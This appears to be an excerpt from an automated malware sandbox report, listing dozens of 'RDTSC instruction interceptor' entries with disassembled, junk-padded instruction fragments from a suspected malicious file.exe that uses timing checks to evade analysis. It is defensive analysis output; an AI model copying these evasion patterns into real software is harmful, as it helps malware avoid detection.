              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C480 second address: 72C494 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF0522A60h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 730F4D second address: 730F5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007FBBF10EEF96h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 730F5E second address: 730F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72EE51 second address: 72EE58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72EE58 second address: 72EE80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBBF0522A68h 0x00000008 jns 00007FBBF0522A56h 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73DDF5 second address: 73DE13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBBF10EEF9Dh 0x00000009 jmp 00007FBBF10EEF9Dh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73DE13 second address: 73DE38 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jg 00007FBBF0522A56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jmp 00007FBBF0522A66h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F48F second address: 73F495 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F495 second address: 73F49D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 741694 second address: 7416A6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBBF10EEF9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7416A6 second address: 7416B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FBBF0522A56h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7416B0 second address: 7416B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74406D second address: 744071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 744071 second address: 7440A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBF10EEFA5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FBBF10EEFA2h 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7440A2 second address: 7440AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7440AA second address: 7440AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75BD27 second address: 75BD46 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FBBF0522A62h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C089 second address: 75C08F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C08F second address: 75C093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C1EE second address: 75C1F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C1F3 second address: 75C207 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FBBF0522A5Eh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C4BC second address: 75C4C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FBBF10EEF96h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C635 second address: 75C63B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75CA55 second address: 75CA64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBBF10EEF9Ah 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75CA64 second address: 75CA6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75CA6C second address: 75CA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75FCF3 second address: 75FCF8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762A21 second address: 762A27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 764328 second address: 764333 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 764333 second address: 76435E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FBBF10EEF96h 0x0000000a jmp 00007FBBF10EEFA6h 0x0000000f jo 00007FBBF10EEF96h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 pop eax 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76435E second address: 764379 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007FBBF0522A62h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 764379 second address: 764385 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jc 00007FBBF10EEF96h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67F829 second address: 67F845 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF0522A61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 497034E second address: 4970352 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4970352 second address: 4970358 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A05DB second address: 49A05F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBBF10EEFA4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A063E second address: 49A0644 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0644 second address: 49A0668 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF10EEFA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0668 second address: 49A067E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBF0522A61h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A067E second address: 4990236 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 54CC2572h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop esi 0x0000000e pushad 0x0000000f mov cx, bx 0x00000012 jmp 00007FBBF10EEFA1h 0x00000017 popad 0x00000018 leave 0x00000019 jmp 00007FBBF10EEF9Eh 0x0000001e retn 0004h 0x00000021 nop 0x00000022 cmp eax, 00000000h 0x00000025 setne al 0x00000028 xor ebx, ebx 0x0000002a test al, 01h 0x0000002c jne 00007FBBF10EEF97h 0x0000002e xor eax, eax 0x00000030 sub esp, 08h 0x00000033 mov dword ptr [esp], 00000000h 0x0000003a mov dword ptr [esp+04h], 00000000h 0x00000042 call 00007FBBF55D85FFh 0x00000047 mov edi, edi 0x00000049 pushad 0x0000004a mov di, cx 0x0000004d push eax 0x0000004e push edx 0x0000004f mov edi, eax 0x00000051 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990236 second address: 49902BE instructions: 0x00000000 rdtsc 0x00000002 call 00007FBBF0522A64h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ebx 0x0000000c jmp 00007FBBF0522A5Eh 0x00000011 mov dword ptr [esp], ebp 0x00000014 jmp 00007FBBF0522A60h 0x00000019 mov ebp, esp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FBBF0522A5Eh 0x00000022 sbb esi, 41D64978h 0x00000028 jmp 00007FBBF0522A5Bh 0x0000002d popfd 0x0000002e push eax 0x0000002f push edx 0x00000030 pushfd 0x00000031 jmp 00007FBBF0522A66h 0x00000036 or cl, FFFFFFD8h 0x00000039 jmp 00007FBBF0522A5Bh 0x0000003e popfd 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49902BE second address: 49902F2 instructions: 0x00000000 rdtsc 0x00000002 mov cx, 2A8Fh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push FFFFFFFEh 0x0000000b jmp 00007FBBF10EEFA2h 0x00000010 call 00007FBBF10EEF99h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov ebx, 2AAC8C50h 0x0000001d mov edi, 6F561D7Ch 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49902F2 second address: 4990343 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF0522A62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FBBF0522A61h 0x00000011 sbb ax, 7786h 0x00000016 jmp 00007FBBF0522A61h 0x0000001b popfd 0x0000001c mov esi, 60D77137h 0x00000021 popad 0x00000022 mov eax, dword ptr [esp+04h] 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990343 second address: 4990349 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990349 second address: 4990366 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF0522A61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990366 second address: 4990380 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF10EEFA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990380 second address: 4990386 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990386 second address: 4990419 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF10EEF9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 call 00007FBBF10EEFA7h 0x00000015 jmp 00007FBBF10EEFA8h 0x0000001a pop esi 0x0000001b mov esi, edi 0x0000001d popad 0x0000001e pop eax 0x0000001f jmp 00007FBBF10EEF9Dh 0x00000024 push 101CACAFh 0x00000029 jmp 00007FBBF10EEFA7h 0x0000002e add dword ptr [esp], 65887EC1h 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FBBF10EEFA5h 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990419 second address: 4990458 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, dl 0x00000005 jmp 00007FBBF0522A68h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr fs:[00000000h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FBBF0522A67h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990458 second address: 499045E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499045E second address: 4990462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990462 second address: 49904AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF10EEF9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007FBBF10EEFA6h 0x00000011 push eax 0x00000012 jmp 00007FBBF10EEF9Bh 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FBBF10EEFA5h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49904AE second address: 4990526 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF0522A61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 18h 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FBBF0522A5Ch 0x00000013 and si, 8518h 0x00000018 jmp 00007FBBF0522A5Bh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FBBF0522A68h 0x00000024 sub ah, 00000078h 0x00000027 jmp 00007FBBF0522A5Bh 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FBBF0522A65h 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990526 second address: 499052C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499052C second address: 4990530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990530 second address: 49905AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov bx, AAC6h 0x0000000e popad 0x0000000f xchg eax, ebx 0x00000010 pushad 0x00000011 mov esi, ebx 0x00000013 push ebx 0x00000014 mov ebx, eax 0x00000016 pop esi 0x00000017 popad 0x00000018 push esi 0x00000019 jmp 00007FBBF10EEF9Ah 0x0000001e mov dword ptr [esp], esi 0x00000021 pushad 0x00000022 mov bx, si 0x00000025 mov ecx, 5BA1C9B9h 0x0000002a popad 0x0000002b xchg eax, edi 0x0000002c jmp 00007FBBF10EEFA4h 0x00000031 push eax 0x00000032 jmp 00007FBBF10EEF9Bh 0x00000037 xchg eax, edi 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007FBBF10EEF9Bh 0x00000041 jmp 00007FBBF10EEFA3h 0x00000046 popfd 0x00000047 mov ecx, 5FE4C11Fh 0x0000004c popad 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49905AB second address: 49905B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49905B1 second address: 49905EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF10EEFA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [75AB4538h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FBBF10EEFA5h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49905EA second address: 4990675 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 4AC05A32h 0x00000008 call 00007FBBF0522A63h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xor dword ptr [ebp-08h], eax 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FBBF0522A65h 0x0000001b add si, C9B6h 0x00000020 jmp 00007FBBF0522A61h 0x00000025 popfd 0x00000026 call 00007FBBF0522A60h 0x0000002b mov di, cx 0x0000002e pop esi 0x0000002f popad 0x00000030 xor eax, ebp 0x00000032 jmp 00007FBBF0522A5Ah 0x00000037 nop 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FBBF0522A67h 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990675 second address: 49906A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF10EEFA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FBBF10EEF9Ah 0x00000012 pop ecx 0x00000013 mov dh, 98h 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49906A4 second address: 49906C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBBF0522A68h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49906C0 second address: 4990729 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF10EEF9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007FBBF10EEFA6h 0x00000011 lea eax, dword ptr [ebp-10h] 0x00000014 pushad 0x00000015 mov ecx, 30B5785Dh 0x0000001a pushfd 0x0000001b jmp 00007FBBF10EEF9Ah 0x00000020 sub al, FFFFFFB8h 0x00000023 jmp 00007FBBF10EEF9Bh 0x00000028 popfd 0x00000029 popad 0x0000002a mov dword ptr fs:[00000000h], eax 0x00000030 pushad 0x00000031 call 00007FBBF10EEFA4h 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990729 second address: 499074F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov edi, 584060C4h 0x0000000a popad 0x0000000b mov dword ptr [ebp-18h], esp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBBF0522A66h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499074F second address: 4990836 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 33639124h 0x00000008 pushfd 0x00000009 jmp 00007FBBF10EEF9Dh 0x0000000e add esi, 69B69766h 0x00000014 jmp 00007FBBF10EEFA1h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov eax, dword ptr fs:[00000018h] 0x00000023 jmp 00007FBBF10EEF9Eh 0x00000028 mov ecx, dword ptr [eax+00000FDCh] 0x0000002e jmp 00007FBBF10EEFA0h 0x00000033 test ecx, ecx 0x00000035 jmp 00007FBBF10EEFA0h 0x0000003a jns 00007FBBF10EEFDEh 0x00000040 pushad 0x00000041 push esi 0x00000042 pushfd 0x00000043 jmp 00007FBBF10EEF9Dh 0x00000048 sub cl, FFFFFFD6h 0x0000004b jmp 00007FBBF10EEFA1h 0x00000050 popfd 0x00000051 pop esi 0x00000052 jmp 00007FBBF10EEFA1h 0x00000057 popad 0x00000058 add eax, ecx 0x0000005a jmp 00007FBBF10EEF9Eh 0x0000005f mov ecx, dword ptr [ebp+08h] 0x00000062 pushad 0x00000063 pushfd 0x00000064 jmp 00007FBBF10EEF9Eh 0x00000069 jmp 00007FBBF10EEFA5h 0x0000006e popfd 0x0000006f pushad 0x00000070 push eax 0x00000071 push edx 0x00000072 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990836 second address: 4990846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 test ecx, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990846 second address: 499084A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499084A second address: 499084E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499084E second address: 4990854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49803F9 second address: 49803FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49803FD second address: 4980412 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF10EEFA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4980412 second address: 498043B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007FBBF0522A65h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 498043B second address: 498044E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF10EEF9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 498044E second address: 49804C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF0522A69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 2Ch 0x0000000c pushad 0x0000000d jmp 00007FBBF0522A5Ch 0x00000012 pushfd 0x00000013 jmp 00007FBBF0522A62h 0x00000018 jmp 00007FBBF0522A65h 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebx 0x00000020 jmp 00007FBBF0522A5Eh 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FBBF0522A5Eh 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49804C5 second address: 49804D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBBF10EEF9Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49804D7 second address: 49804DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49804DB second address: 49804EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49804EA second address: 49804EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49804EE second address: 49804F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
